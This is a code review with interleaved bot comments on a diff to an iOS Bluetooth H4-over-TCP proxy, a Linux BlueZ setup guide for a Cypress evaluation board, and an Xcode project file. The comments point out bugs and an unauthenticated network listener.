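Review bot: `ctl_inf` is heap allocated (it is freed only at the end of the success path later in this function) and leaks on this `return -1`, as it does on the `connect`, `getsockopt`, `cfsetspeed` and `setsockopt` error returns below; free it before each early return, or allocate `struct ctl_info` on the stack. `strcpy` into `ctl_name` is safe for this literal, but `strlcpy(ctl_inf->ctl_name, "com.apple.uart.bluetooth", sizeof(ctl_inf->ctl_name))` documents the bound.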
@@ -67,27 +67,27 @@ int connect_bt_device() {
*(int *)&sock_addr.sa_data[2] = ctl_inf->ctl_id;
ret = connect(socket_fd, &sock_addr, 0x20);
if (ret != 0) {
printf("connect() = %d - errno: %d\n", ret, errno);
printf("error: %s\n", strerror(errno));
printf("[!] connect() = %d - errno: %d\n", ret, errno);
printf("[!] error: %s\n", strerror(errno));
return -1;
}
printf("Connected to bt device\n");
printf("[*] Connected to Bluetooth chip H4 socket\n");
socklen_t len = 72;
ret = getsockopt(socket_fd, 2, TIOCGETA, &term, &len);
if (ret != 0) {
printf("getsockopt(TIOCGETA) = %d - errno: %d\n", ret, errno);
printf("error: %s\n", strerror(errno));
printf("[!] getsockopt(TIOCGETA) = %d - errno: %d\n", ret, errno);
printf("[!] error: %s\n", strerror(errno));
return -1;
}
cfmakeraw(&term);
ret = cfsetspeed(&term, 3000000);
if (ret != 0) {
printf("cfsetspeed() = %d - errno: %d\n", ret, errno);
printf("error: %s\n", strerror(errno));
printf("[!] cfsetspeed() = %d - errno: %d\n", ret, errno);
printf("[!] error: %s\n", strerror(errno));
return -1;
}
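Review bot: `socklen_t len = 72;`, `getsockopt(socket_fd, 2, TIOCGETA, ...)` and `connect(socket_fd, &sock_addr, 0x20)` hard-code sizes and levels: 72 matches `sizeof(struct termios)` on 64-bit Darwin, 2 is `SYSPROTO_CONTROL` and 0x20 matches `sizeof(struct sockaddr_ctl)`. Spell them as `sizeof(term)`, `SYSPROTO_CONTROL` and `sizeof(sock_addr)` so the code reads as intended and survives a layout change. The connect call also writes the control id through `*(int *)&sock_addr.sa_data[2]`; declaring a `struct sockaddr_ctl` and setting `sc_id` directly removes the aliasing cast.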
@@ -95,13 +95,12 @@ int connect_bt_device() {
term.c_cflag = 232192;
ret = setsockopt(socket_fd, 2, TIOCSETA, &term, 0x48);
if (ret != 0) {
printf("setsockopt() = %d - errno: %d\n", ret, errno);
printf("error: %s\n", strerror(errno));
printf("[!] setsockopt() = %d - errno: %d\n", ret, errno);
printf("[!] error: %s\n", strerror(errno));
return -1;
}
tcflush(socket_fd, 3);
free(ctl_inf);
return socket_fd;
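Review bot: `term.c_cflag = 232192;` is a magic number; it decodes to `CS8 | CREAD | CLOCAL | CRTSCTS` (0x300 | 0x800 | 0x8000 | 0x30000 = 0x38B00 with Darwin's termios values), which is self-documenting and tells the reader what the UART setup is (8N1 with hardware flow control at the 3 Mbit/s set just above). The same goes for `setsockopt(..., &term, 0x48)` (use `sizeof(term)`) and `tcflush(socket_fd, 3)` (`TCIOFLUSH`). Note also that the `c_cflag` produced by `cfmakeraw` is replaced outright by this assignment; if the intent is only to add flags, OR them in instead.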
@@ -115,7 +114,7 @@ int create_server(int port) {
server_fd = socket(AF_INET, SOCK_STREAM, 0);
if (server_fd < 0) {
printf("Unable to create server socket\n");
printf("[!] Unable to create server socket\n");
return -1;
}
@@ -127,16 +126,16 @@ int create_server(int port) {
setsockopt(server_fd, SOL_SOCKET, SO_REUSEADDR, &on, 4);
if (bind(server_fd, (struct sockaddr *)&server, sizeof(server)) < 0) {
printf("Error binding socket\n");
printf("[!] Error binding socket\n");
return -1;
}
if (listen(server_fd, 5) < 0) {
printf("Failed listening: %s\n", strerror(errno));
printf("[!] Failed listening on port %d, Error: %s\n", port, strerror(errno));
return -1;
}
printf("Listening on port %d\n", port);
printf("[*] Listening on port %d\n", port);
return server_fd;
}
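Review bot: the listener is created with no access control, and the README tells users it is reachable over Wi-Fi, so any host that can reach the port gets raw HCI access to the chip. This hunk does not show the address `server` is bound to; if it is `INADDR_ANY`, bind to `127.0.0.1` by default (connections forwarded over USB by usbmuxd still reach it) and require an explicit flag to listen on all interfaces. The improved `listen` error message is good; the same treatment (port and `strerror`) would help the `bind` failure two lines above it.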
@@ -150,82 +149,58 @@ int wait_for_connection(int server_fd) {
client_fd = accept(server_fd, (struct sockaddr *)&client, (socklen_t *)&len);
if (client_fd < 0) {
printf("Accepting connection failed\n");
printf("[!] Accepting connection failed\n");
return -1;
}
return client_fd;
}
size_t buffered_write(int fd, char *buf, int *len)
{
size_t x = write(fd, buf, *len);
if (x < 0)
return x;
if (x == 0)
return x;
if (x != *len)
memmove(buf, buf+x, (*len)-x);
*len -= x;
return x;
}
void proxy_bt_socket(int client, int bt) {
char *client_buf, *bt_buf;
int nfds;
int nfds, x;
fd_set R;
int client_out = 0;
int bt_out = 0;
int x;
size_t n;
client_buf = malloc(1024);
bt_buf = malloc(1024);
client_buf = malloc(0x2000);
bt_buf = malloc(0x2000);
nfds = client > bt ? client : bt;
nfds++;
while(1) {
struct timeval to;
if (client_out) {
buffered_write(bt, client_buf, &client_out);
}
if (bt_out) {
buffered_write(client, bt_buf, &bt_out);
}
FD_ZERO(&R);
if (client_out < 1024)
FD_SET(client, &R);
if (bt_out < 1024)
FD_SET(bt, &R);
FD_SET(client, &R);
FD_SET(bt, &R);
to.tv_sec = 0;
to.tv_usec = 1000;
to.tv_usec = 100;
x = select(nfds+1, &R, 0, 0, &to);
if (x > 0) {
if (FD_ISSET(client, &R)) {
n = read(client, client_buf+client_out, 1024-client_out);
if (n > 0) {
client_out += n;
} else {
close(client);
printf("Client read failed\n");
return;
}
n = read(client, client_buf, 4096);
if (n > 0) {
write(bt, client_buf, n);
} else {
close(client);
printf("[!] Client read failed\n");
return;
}
}
if (FD_ISSET(bt, &R)) {
n = read(bt, bt_buf+bt_out, 1024-bt_out);
if (n > 0) {
bt_out += n;
} else {
close(client);
printf("BT read failed\n");
return;
}
n = read(bt, bt_buf, 4096);
if (n > 0) {
write(client, bt_buf, n);
} else {
close(client);
printf("[!] H4 socket read failed\n");
return;
}
}
} else if (x < 0 && errno != EINTR){
printf("Select failed with %s\n", strerror(errno));
printf("[!] Select failed with %s\n", strerror(errno));
close(client);
return;
}
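Review bot: `size_t n;` with `n = read(client, client_buf, 4096);` loses the sign of `read`'s `ssize_t` result: on error -1 becomes `SIZE_MAX`, `if (n > 0)` is true, and `write(bt, client_buf, n)` is issued with a length far beyond the 0x2000-byte buffer (the removed `buffered_write` had the same defect, `size_t x = write(...)` followed by an `x < 0` test that could never be true). Declare `ssize_t n`, and retry on `errno == EINTR` instead of treating it as a disconnect. Second, dropping `buffered_write` means the `write()` results are now ignored entirely: a short write to either side silently discards the tail of an H4 packet and desynchronises the stream for every packet after it, which is a plausible source of the "iOS socket is rather unreliable" length juggling in `iOSCore._getLatestH4Blob`; loop until all `n` bytes are written, or keep the buffered path. Minor: `nfds` is already `max+1` after `nfds++`, so `select(nfds+1, ...)` is off by one (harmless), and a 100 µs `select` timeout with nothing else to do in the loop is a busy-wait; a longer timeout or none at all is cheaper.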
@@ -250,32 +225,36 @@ int main(int argc, char **argv) {
port = atoi(argv[1]);
// wake BT device
btwake_fd = open("/dev/btwake", 0);
while (1) {
// wake BT device
btwake_fd = open("/dev/btwake", 0);
bt_fd = connect_bt_device();
if (bt_fd < 0) {
printf("[!] Error connecting to bluetooth device\n");
return -1;
}
server_fd = create_server(port);
if (server_fd < 0) {
printf("[!] Unable to create proxy server\n");
return -1;
}
printf("[*] Created proxy server\n");
signal(SIGINT, __exit);
bt_fd = connect_bt_device();
if (bt_fd < 0) {
printf("Error connecting to bluetooth device\n");
return -1;
}
server_fd = create_server(port);
if (server_fd < 0) {
printf("Unable to create server\n");
return -1;
}
printf("Created server\n");
signal(SIGINT, __exit);
while (1) {
printf("Waiting for connection\n");
printf("[*] Waiting for remote connection\n");
client_fd = wait_for_connection(server_fd);
if (client_fd < 0)
continue;
// currently only one connection is supported
printf("[!] Unable to connect remote device to proxy\n");
// currently only one connection is supported
proxy_bt_socket(client_fd, bt_fd);
close(client_fd);
close(server_fd);
close(bt_fd);
close(btwake_fd);
}
return 0;
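Review bot: the `[!] Unable to connect remote device to proxy` message is printed on the success path: as rendered, `wait_for_connection` has already returned a valid `client_fd` when it is reached, and if the line was meant to replace `continue;`, the failure path now falls through into `proxy_bt_socket(client_fd, bt_fd)` with `client_fd == -1`. Put the message inside the `if (client_fd < 0)` branch and keep the `continue`. Also in this hunk: the result of `open("/dev/btwake", 0)` is never checked, so a missing device silently yields `btwake_fd == -1` and a `close(-1)` at the end of every iteration; and because the loop now tears down and re-creates the listening socket after each client, `create_server` needs SO_REUSEADDR or the rebind can fail with EADDRINUSE while the previous connection is in TIME_WAIT, at which point `return -1` exits the whole proxy. Since anything that connects to this port gets raw H4 access to the controller, it is worth confirming that `create_server` binds loopback only, or documenting that the port must be firewalled.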
Binary file not shown.
@@ -0,0 +1,81 @@
Linux Setup
-----------
The following steps are required to use the CYW20735B1 evaluation kit as normal HCI device on Linux with BlueZ.
**1. Setup as HCI device**
You need to set the baud rate to 3 Mbit/s. Replace `/dev/ttyUSB0` with your device.
btattach -B /dev/ttyUSB0 -S 3000000
If this does not work directly, use:
stty -F /dev/ttyUSB0 3000000
btattach -B /dev/ttyUSB0
Sometimes, you need to plug/unplug the evaluation board multiple times and run a combination of the commands above.
If setup was successful can be checked with `hciconfig`. A MAC address with all zeros indicates that the baud rate
was not set correctly and you need to try again.
**2. Use with BlueZ**
Assuming that you already have a regular Bluetooth device, you new device is `hci1`.
hciconfig hci1 up
You can list your HCI devices:
hcitool dev
**3. Command line tools for connections**
Scanning for devices:
hcitool scan
hcitool lescan
Connections and pairing:
bluetoothctl
Enter into `bluetoothctl` command prompt:
power on
agent on
default-agent
scan on
Optional - accept connections:
advertise on
pairable on
discoverable on
Do a pairing and then connect:
pair aa:bb:cc:dd:ee:ff
connect aa:bb:cc:dd:ee:ff
Diagnostics
-----------
On some devices, diagnostic logging for LMP and LCP already works out of the box.
Note that diagnostics can do more, but the additional features are currently not
integrated into *BlueZ* or the Linux kernel.
To enable diagnostics, execute:
echo 1 > /sys/kernel/debug/bluetooth/hci0/vendor_diag
By default, this entry is only created for Intel and Broadcom chips.
The evaluation board claims to be Cypress, a different vendor ID, thus
the vendor diagnostics are missing.
*BlueZ* already comes with a monitor that decodes some parts of the diagnostic
traffic, simply run:
btmon
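Review bot: the Diagnostics section writes to `/sys/kernel/debug/bluetooth/hci0/vendor_diag` while the setup section says the evaluation board comes up as `hci1` when a built-in adapter is present; the index has to match the board, otherwise the command enables diagnostics on the wrong controller (or fails, as the text itself notes, because the entry only exists for Intel and Broadcom). State explicitly which index to use and that the write requires root. One wording fix: `If setup was successful can be checked with hciconfig` should read `Whether setup was successful can be checked with hciconfig`. Since `hciconfig` and `hcitool` are deprecated in BlueZ 5 and some distributions no longer ship them, it would help to mention `bluetoothctl list` as the alternative to `hcitool dev`.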
@@ -0,0 +1,532 @@
// !$*UTF8*$!
{
archiveVersion = 1;
classes = {
};
objectVersion = 50;
objects = {
/* Begin PBXBuildFile section */
8C3047E2231D7CAE0003E282 /* HCIDelegate.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C3047E1231D7CAE0003E282 /* HCIDelegate.m */; };
8C3047EA231DCDE30003E282 /* HCIDelegate.swift in Sources */ = {isa = PBXBuildFile; fileRef = 8C3047E9231DCDE30003E282 /* HCIDelegate.swift */; };
8C31742A22D1049E004B9604 /* IOBluetoothExtended.framework in Frameworks */ = {isa = PBXBuildFile; fileRef = 8C31742022D1049D004B9604 /* IOBluetoothExtended.framework */; };
8C31742F22D1049E004B9604 /* IOBluetoothExtendedTests.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C31742E22D1049E004B9604 /* IOBluetoothExtendedTests.m */; };
8C31743122D1049E004B9604 /* IOBluetoothExtended.h in Headers */ = {isa = PBXBuildFile; fileRef = 8C31742322D1049D004B9604 /* IOBluetoothExtended.h */; settings = {ATTRIBUTES = (Public, ); }; };
8C3174AF22D10E11004B9604 /* HCIDelegate.h in Headers */ = {isa = PBXBuildFile; fileRef = 8C31743A22D104DA004B9604 /* HCIDelegate.h */; settings = {ATTRIBUTES = (Public, ); }; };
8C3174B122D10E4C004B9604 /* IOBluetoothHostController.h in Headers */ = {isa = PBXBuildFile; fileRef = 8C31744122D10516004B9604 /* IOBluetoothHostController.h */; settings = {ATTRIBUTES = (Public, ); }; };
8C57A7432333A6E100037C3D /* HCICommunicator.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C57A7422333A6E100037C3D /* HCICommunicator.m */; };
8C57A7442333A7C400037C3D /* HCICommunicator.h in Headers */ = {isa = PBXBuildFile; fileRef = 8C57A7412333A6D000037C3D /* HCICommunicator.h */; settings = {ATTRIBUTES = (Public, ); }; };
8C72A82823339457001A9806 /* IOBE.m in Sources */ = {isa = PBXBuildFile; fileRef = 8C72A82723339457001A9806 /* IOBE.m */; };
8CE61E5D232AE8D20086419F /* Extensions.swift in Sources */ = {isa = PBXBuildFile; fileRef = 8CE61E5C232AE8D20086419F /* Extensions.swift */; };
/* End PBXBuildFile section */
/* Begin PBXContainerItemProxy section */
8C31742B22D1049E004B9604 /* PBXContainerItemProxy */ = {
isa = PBXContainerItemProxy;
containerPortal = 8C31741722D1049D004B9604 /* Project object */;
proxyType = 1;
remoteGlobalIDString = 8C31741F22D1049D004B9604;
remoteInfo = IOBluetoothExtended;
};
/* End PBXContainerItemProxy section */
/* Begin PBXFileReference section */
8C3047E1231D7CAE0003E282 /* HCIDelegate.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = HCIDelegate.m; sourceTree = "<group>"; };
8C3047E9231DCDE30003E282 /* HCIDelegate.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = HCIDelegate.swift; sourceTree = "<group>"; };
8C31742022D1049D004B9604 /* IOBluetoothExtended.framework */ = {isa = PBXFileReference; explicitFileType = wrapper.framework; includeInIndex = 0; path = IOBluetoothExtended.framework; sourceTree = BUILT_PRODUCTS_DIR; };
8C31742322D1049D004B9604 /* IOBluetoothExtended.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = IOBluetoothExtended.h; sourceTree = "<group>"; };
8C31742422D1049D004B9604 /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = "<group>"; };
8C31742922D1049E004B9604 /* IOBluetoothExtendedTests.xctest */ = {isa = PBXFileReference; explicitFileType = wrapper.cfbundle; includeInIndex = 0; path = IOBluetoothExtendedTests.xctest; sourceTree = BUILT_PRODUCTS_DIR; };
8C31742E22D1049E004B9604 /* IOBluetoothExtendedTests.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = IOBluetoothExtendedTests.m; sourceTree = "<group>"; };
8C31743022D1049E004B9604 /* Info.plist */ = {isa = PBXFileReference; lastKnownFileType = text.plist.xml; path = Info.plist; sourceTree = "<group>"; };
8C31743A22D104DA004B9604 /* HCIDelegate.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = HCIDelegate.h; sourceTree = "<group>"; };
8C31744122D10516004B9604 /* IOBluetoothHostController.h */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.h; path = IOBluetoothHostController.h; sourceTree = "<group>"; };
8C57A7412333A6D000037C3D /* HCICommunicator.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = HCICommunicator.h; sourceTree = "<group>"; };
8C57A7422333A6E100037C3D /* HCICommunicator.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = HCICommunicator.m; sourceTree = "<group>"; };
8C72A82723339457001A9806 /* IOBE.m */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.objc; path = IOBE.m; sourceTree = "<group>"; };
8C72A8322333A100001A9806 /* IOBE.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = IOBE.h; sourceTree = "<group>"; };
8CE61E5C232AE8D20086419F /* Extensions.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = Extensions.swift; sourceTree = "<group>"; };
/* End PBXFileReference section */
/* Begin PBXFrameworksBuildPhase section */
8C31741D22D1049D004B9604 /* Frameworks */ = {
isa = PBXFrameworksBuildPhase;
buildActionMask = 2147483647;
files = (
);
runOnlyForDeploymentPostprocessing = 0;
};
8C31742622D1049E004B9604 /* Frameworks */ = {
isa = PBXFrameworksBuildPhase;
buildActionMask = 2147483647;
files = (
8C31742A22D1049E004B9604 /* IOBluetoothExtended.framework in Frameworks */,
);
runOnlyForDeploymentPostprocessing = 0;
};
/* End PBXFrameworksBuildPhase section */
/* Begin PBXGroup section */
8C31741622D1049D004B9604 = {
isa = PBXGroup;
children = (
8C31742222D1049D004B9604 /* IOBluetoothExtended */,
8C31742D22D1049E004B9604 /* IOBluetoothExtendedTests */,
8C31742122D1049D004B9604 /* Products */,
);
sourceTree = "<group>";
};
8C31742122D1049D004B9604 /* Products */ = {
isa = PBXGroup;
children = (
8C31742022D1049D004B9604 /* IOBluetoothExtended.framework */,
8C31742922D1049E004B9604 /* IOBluetoothExtendedTests.xctest */,
);
name = Products;
sourceTree = "<group>";
};
8C31742222D1049D004B9604 /* IOBluetoothExtended */ = {
isa = PBXGroup;
children = (
8C72A82B2333949C001A9806 /* Util */,
8C31742322D1049D004B9604 /* IOBluetoothExtended.h */,
8C31744122D10516004B9604 /* IOBluetoothHostController.h */,
8C72A8322333A100001A9806 /* IOBE.h */,
8C72A82723339457001A9806 /* IOBE.m */,
8C31743A22D104DA004B9604 /* HCIDelegate.h */,
8C3047E1231D7CAE0003E282 /* HCIDelegate.m */,
8C3047E9231DCDE30003E282 /* HCIDelegate.swift */,
8C57A7412333A6D000037C3D /* HCICommunicator.h */,
8C57A7422333A6E100037C3D /* HCICommunicator.m */,
8CE61E5C232AE8D20086419F /* Extensions.swift */,
8C31742422D1049D004B9604 /* Info.plist */,
);
path = IOBluetoothExtended;
sourceTree = "<group>";
};
8C31742D22D1049E004B9604 /* IOBluetoothExtendedTests */ = {
isa = PBXGroup;
children = (
8C31742E22D1049E004B9604 /* IOBluetoothExtendedTests.m */,
8C31743022D1049E004B9604 /* Info.plist */,
);
path = IOBluetoothExtendedTests;
sourceTree = "<group>";
};
8C72A82B2333949C001A9806 /* Util */ = {
isa = PBXGroup;
children = (
);
path = Util;
sourceTree = "<group>";
};
/* End PBXGroup section */
/* Begin PBXHeadersBuildPhase section */
8C31741B22D1049D004B9604 /* Headers */ = {
isa = PBXHeadersBuildPhase;
buildActionMask = 2147483647;
files = (
8C57A7442333A7C400037C3D /* HCICommunicator.h in Headers */,
8C3174AF22D10E11004B9604 /* HCIDelegate.h in Headers */,
8C31743122D1049E004B9604 /* IOBluetoothExtended.h in Headers */,
8C3174B122D10E4C004B9604 /* IOBluetoothHostController.h in Headers */,
);
runOnlyForDeploymentPostprocessing = 0;
};
/* End PBXHeadersBuildPhase section */
/* Begin PBXNativeTarget section */
8C31741F22D1049D004B9604 /* IOBluetoothExtended */ = {
isa = PBXNativeTarget;
buildConfigurationList = 8C31743422D1049E004B9604 /* Build configuration list for PBXNativeTarget "IOBluetoothExtended" */;
buildPhases = (
8C31741B22D1049D004B9604 /* Headers */,
8C31741C22D1049D004B9604 /* Sources */,
8C31741D22D1049D004B9604 /* Frameworks */,
8C31741E22D1049D004B9604 /* Resources */,
8C5F1E5923605FFF00945944 /* ShellScript */,
);
buildRules = (
);
dependencies = (
);
name = IOBluetoothExtended;
productName = IOBluetoothExtended;
productReference = 8C31742022D1049D004B9604 /* IOBluetoothExtended.framework */;
productType = "com.apple.product-type.framework";
};
8C31742822D1049E004B9604 /* IOBluetoothExtendedTests */ = {
isa = PBXNativeTarget;
buildConfigurationList = 8C31743722D1049E004B9604 /* Build configuration list for PBXNativeTarget "IOBluetoothExtendedTests" */;
buildPhases = (
8C31742522D1049E004B9604 /* Sources */,
8C31742622D1049E004B9604 /* Frameworks */,
8C31742722D1049E004B9604 /* Resources */,
);
buildRules = (
);
dependencies = (
8C31742C22D1049E004B9604 /* PBXTargetDependency */,
);
name = IOBluetoothExtendedTests;
productName = IOBluetoothExtendedTests;
productReference = 8C31742922D1049E004B9604 /* IOBluetoothExtendedTests.xctest */;
productType = "com.apple.product-type.bundle.unit-test";
};
/* End PBXNativeTarget section */
/* Begin PBXProject section */
8C31741722D1049D004B9604 /* Project object */ = {
isa = PBXProject;
attributes = {
LastUpgradeCheck = 1100;
ORGANIZATIONNAME = "Davide Toldo";
TargetAttributes = {
8C31741F22D1049D004B9604 = {
CreatedOnToolsVersion = 10.2.1;
LastSwiftMigration = 1030;
};
8C31742822D1049E004B9604 = {
CreatedOnToolsVersion = 10.2.1;
};
};
};
buildConfigurationList = 8C31741A22D1049D004B9604 /* Build configuration list for PBXProject "IOBluetoothExtended" */;
compatibilityVersion = "Xcode 9.3";
developmentRegion = en;
hasScannedForEncodings = 0;
knownRegions = (
en,
);
mainGroup = 8C31741622D1049D004B9604;
productRefGroup = 8C31742122D1049D004B9604 /* Products */;
projectDirPath = "";
projectRoot = "";
targets = (
8C31741F22D1049D004B9604 /* IOBluetoothExtended */,
8C31742822D1049E004B9604 /* IOBluetoothExtendedTests */,
);
};
/* End PBXProject section */
/* Begin PBXResourcesBuildPhase section */
8C31741E22D1049D004B9604 /* Resources */ = {
isa = PBXResourcesBuildPhase;
buildActionMask = 2147483647;
files = (
);
runOnlyForDeploymentPostprocessing = 0;
};
8C31742722D1049E004B9604 /* Resources */ = {
isa = PBXResourcesBuildPhase;
buildActionMask = 2147483647;
files = (
);
runOnlyForDeploymentPostprocessing = 0;
};
/* End PBXResourcesBuildPhase section */
/* Begin PBXShellScriptBuildPhase section */
8C5F1E5923605FFF00945944 /* ShellScript */ = {
isa = PBXShellScriptBuildPhase;
buildActionMask = 2147483647;
files = (
);
inputFileListPaths = (
);
inputPaths = (
);
outputFileListPaths = (
);
outputPaths = (
);
runOnlyForDeploymentPostprocessing = 0;
shellPath = /bin/sh;
shellScript = "# Type a script or drag a script file from your workspace to insert its path.\ncp -r ${BUILT_PRODUCTS_DIR}/${EXECUTABLE_NAME}.framework ../${EXECUTABLE_NAME}.framework\n";
};
/* End PBXShellScriptBuildPhase section */
/* Begin PBXSourcesBuildPhase section */
8C31741C22D1049D004B9604 /* Sources */ = {
isa = PBXSourcesBuildPhase;
buildActionMask = 2147483647;
files = (
8C72A82823339457001A9806 /* IOBE.m in Sources */,
8CE61E5D232AE8D20086419F /* Extensions.swift in Sources */,
8C57A7432333A6E100037C3D /* HCICommunicator.m in Sources */,
8C3047E2231D7CAE0003E282 /* HCIDelegate.m in Sources */,
8C3047EA231DCDE30003E282 /* HCIDelegate.swift in Sources */,
);
runOnlyForDeploymentPostprocessing = 0;
};
8C31742522D1049E004B9604 /* Sources */ = {
isa = PBXSourcesBuildPhase;
buildActionMask = 2147483647;
files = (
8C31742F22D1049E004B9604 /* IOBluetoothExtendedTests.m in Sources */,
);
runOnlyForDeploymentPostprocessing = 0;
};
/* End PBXSourcesBuildPhase section */
/* Begin PBXTargetDependency section */
8C31742C22D1049E004B9604 /* PBXTargetDependency */ = {
isa = PBXTargetDependency;
target = 8C31741F22D1049D004B9604 /* IOBluetoothExtended */;
targetProxy = 8C31742B22D1049E004B9604 /* PBXContainerItemProxy */;
};
/* End PBXTargetDependency section */
/* Begin XCBuildConfiguration section */
8C31743222D1049E004B9604 /* Debug */ = {
isa = XCBuildConfiguration;
buildSettings = {
ALWAYS_SEARCH_USER_PATHS = NO;
CLANG_ANALYZER_NONNULL = YES;
CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE;
CLANG_CXX_LANGUAGE_STANDARD = "gnu++14";
CLANG_CXX_LIBRARY = "libc++";
CLANG_ENABLE_MODULES = YES;
CLANG_ENABLE_OBJC_ARC = YES;
CLANG_ENABLE_OBJC_WEAK = YES;
CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES;
CLANG_WARN_BOOL_CONVERSION = YES;
CLANG_WARN_COMMA = YES;
CLANG_WARN_CONSTANT_CONVERSION = YES;
CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES;
CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;
CLANG_WARN_DOCUMENTATION_COMMENTS = YES;
CLANG_WARN_EMPTY_BODY = YES;
CLANG_WARN_ENUM_CONVERSION = YES;
CLANG_WARN_INFINITE_RECURSION = YES;
CLANG_WARN_INT_CONVERSION = YES;
CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES;
CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES;
CLANG_WARN_OBJC_LITERAL_CONVERSION = YES;
CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;
CLANG_WARN_RANGE_LOOP_ANALYSIS = YES;
CLANG_WARN_STRICT_PROTOTYPES = YES;
CLANG_WARN_SUSPICIOUS_MOVE = YES;
CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE;
CLANG_WARN_UNREACHABLE_CODE = YES;
CLANG_WARN__DUPLICATE_METHOD_MATCH = YES;
CODE_SIGN_IDENTITY = "Mac Developer";
COPY_PHASE_STRIP = NO;
CURRENT_PROJECT_VERSION = 1;
DEBUG_INFORMATION_FORMAT = dwarf;
ENABLE_STRICT_OBJC_MSGSEND = YES;
ENABLE_TESTABILITY = YES;
GCC_C_LANGUAGE_STANDARD = gnu11;
GCC_DYNAMIC_NO_PIC = NO;
GCC_NO_COMMON_BLOCKS = YES;
GCC_OPTIMIZATION_LEVEL = 0;
GCC_PREPROCESSOR_DEFINITIONS = (
"DEBUG=1",
"$(inherited)",
);
GCC_WARN_64_TO_32_BIT_CONVERSION = YES;
GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR;
GCC_WARN_UNDECLARED_SELECTOR = YES;
GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE;
GCC_WARN_UNUSED_FUNCTION = YES;
GCC_WARN_UNUSED_VARIABLE = YES;
MACOSX_DEPLOYMENT_TARGET = 10.14;
MTL_ENABLE_DEBUG_INFO = INCLUDE_SOURCE;
MTL_FAST_MATH = YES;
ONLY_ACTIVE_ARCH = YES;
SDKROOT = macosx;
VERSIONING_SYSTEM = "apple-generic";
VERSION_INFO_PREFIX = "";
};
name = Debug;
};
8C31743322D1049E004B9604 /* Release */ = {
isa = XCBuildConfiguration;
buildSettings = {
ALWAYS_SEARCH_USER_PATHS = NO;
CLANG_ANALYZER_NONNULL = YES;
CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE;
CLANG_CXX_LANGUAGE_STANDARD = "gnu++14";
CLANG_CXX_LIBRARY = "libc++";
CLANG_ENABLE_MODULES = YES;
CLANG_ENABLE_OBJC_ARC = YES;
CLANG_ENABLE_OBJC_WEAK = YES;
CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES;
CLANG_WARN_BOOL_CONVERSION = YES;
CLANG_WARN_COMMA = YES;
CLANG_WARN_CONSTANT_CONVERSION = YES;
CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES;
CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR;
CLANG_WARN_DOCUMENTATION_COMMENTS = YES;
CLANG_WARN_EMPTY_BODY = YES;
CLANG_WARN_ENUM_CONVERSION = YES;
CLANG_WARN_INFINITE_RECURSION = YES;
CLANG_WARN_INT_CONVERSION = YES;
CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES;
CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES;
CLANG_WARN_OBJC_LITERAL_CONVERSION = YES;
CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR;
CLANG_WARN_RANGE_LOOP_ANALYSIS = YES;
CLANG_WARN_STRICT_PROTOTYPES = YES;
CLANG_WARN_SUSPICIOUS_MOVE = YES;
CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE;
CLANG_WARN_UNREACHABLE_CODE = YES;
CLANG_WARN__DUPLICATE_METHOD_MATCH = YES;
CODE_SIGN_IDENTITY = "Mac Developer";
COPY_PHASE_STRIP = NO;
CURRENT_PROJECT_VERSION = 1;
DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym";
ENABLE_NS_ASSERTIONS = NO;
ENABLE_STRICT_OBJC_MSGSEND = YES;
GCC_C_LANGUAGE_STANDARD = gnu11;
GCC_NO_COMMON_BLOCKS = YES;
GCC_WARN_64_TO_32_BIT_CONVERSION = YES;
GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR;
GCC_WARN_UNDECLARED_SELECTOR = YES;
GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE;
GCC_WARN_UNUSED_FUNCTION = YES;
GCC_WARN_UNUSED_VARIABLE = YES;
MACOSX_DEPLOYMENT_TARGET = 10.14;
MTL_ENABLE_DEBUG_INFO = NO;
MTL_FAST_MATH = YES;
SDKROOT = macosx;
SWIFT_COMPILATION_MODE = wholemodule;
VERSIONING_SYSTEM = "apple-generic";
VERSION_INFO_PREFIX = "";
};
name = Release;
};
8C31743522D1049E004B9604 /* Debug */ = {
isa = XCBuildConfiguration;
buildSettings = {
CLANG_ALLOW_NON_MODULAR_INCLUDES_IN_FRAMEWORK_MODULES = YES;
CLANG_ENABLE_MODULES = YES;
CODE_SIGN_IDENTITY = "";
CODE_SIGN_STYLE = Automatic;
COMBINE_HIDPI_IMAGES = YES;
DEFINES_MODULE = YES;
DEVELOPMENT_TEAM = 27U966V459;
DYLIB_COMPATIBILITY_VERSION = 1;
